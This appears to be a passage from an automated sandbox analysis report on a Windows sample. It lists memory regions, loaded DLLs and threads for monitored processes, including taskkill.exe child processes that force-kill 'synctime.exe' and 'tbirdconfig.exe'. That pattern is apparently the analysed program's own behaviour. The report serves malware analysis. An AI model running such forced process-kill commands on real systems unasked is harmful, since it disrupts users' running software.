Region: id = 2833 start_va = 0x1b20000 end_va = 0x1bdffff entry_point = 0x1b20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2834 start_va = 0x1be0000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 2835 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2836 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 2837 start_va = 0x1ec0000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 2838 start_va = 0x1f40000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2839 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2840 start_va = 0x20e0000 end_va = 0x23aefff entry_point = 0x20e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2841 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2842 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2843 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2844 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2845 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2846 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2847 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2848 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2849 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2850 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2851 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2852 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2853 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2854 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2855 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2856 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2857 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2858 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2859 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2860 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2861 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2862 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2863 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2864 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2865 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2866 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2867 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2868 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2869 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2870 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2871 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2872 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2873 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2874 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2875 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2876 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2877 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2878 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2879 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2880 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 226 os_tid = 0x910 Thread: id = 247 os_tid = 0xc64 Thread: id = 252 os_tid = 0xc7c Thread: id = 255 os_tid = 0xc90 Thread: id = 256 os_tid = 0xc94 Process: id = "34" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1a5dc000" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM synctime.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2584 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2585 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2586 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2587 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2588 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2589 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2590 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2591 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2592 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2593 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2594 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2595 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2596 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2597 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2598 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2993 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2994 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2995 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2996 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2997 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2998 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2999 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3000 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3001 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 3002 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3003 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3004 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3005 start_va = 0x450000 end_va = 0x5d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3006 start_va = 0x5e0000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 3007 start_va = 0x770000 end_va = 0x1b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3008 start_va = 0x1b70000 end_va = 0x1c2ffff entry_point = 0x1b70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3009 start_va = 0x1c60000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 3010 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 3011 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3012 start_va = 0x1e80000 end_va = 0x214efff entry_point = 0x1e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3013 start_va = 0x21e0000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 3014 start_va = 0x2390000 end_va = 0x240ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 3015 start_va = 0x2440000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 3016 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3017 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3018 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3019 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3020 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3021 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3022 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3023 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3024 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3025 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3026 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3027 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3028 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3029 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3030 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3031 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3032 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3033 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3034 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3035 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3036 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3037 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3038 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3039 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3040 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3041 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3042 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3043 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3044 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3045 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3046 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3047 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3048 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3049 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3050 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3051 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3052 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3053 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3054 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3055 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 236 os_tid = 0xc20 Thread: id = 264 os_tid = 0xcd8 Thread: id = 268 os_tid = 0xd08 Thread: id = 271 os_tid = 0xd14 Thread: id = 272 os_tid = 0xd18 Process: id = "35" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x208fd000" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM tbirdconfig.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2599 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2600 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2601 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2602 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2603 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2604 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2605 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2606 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2607 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = 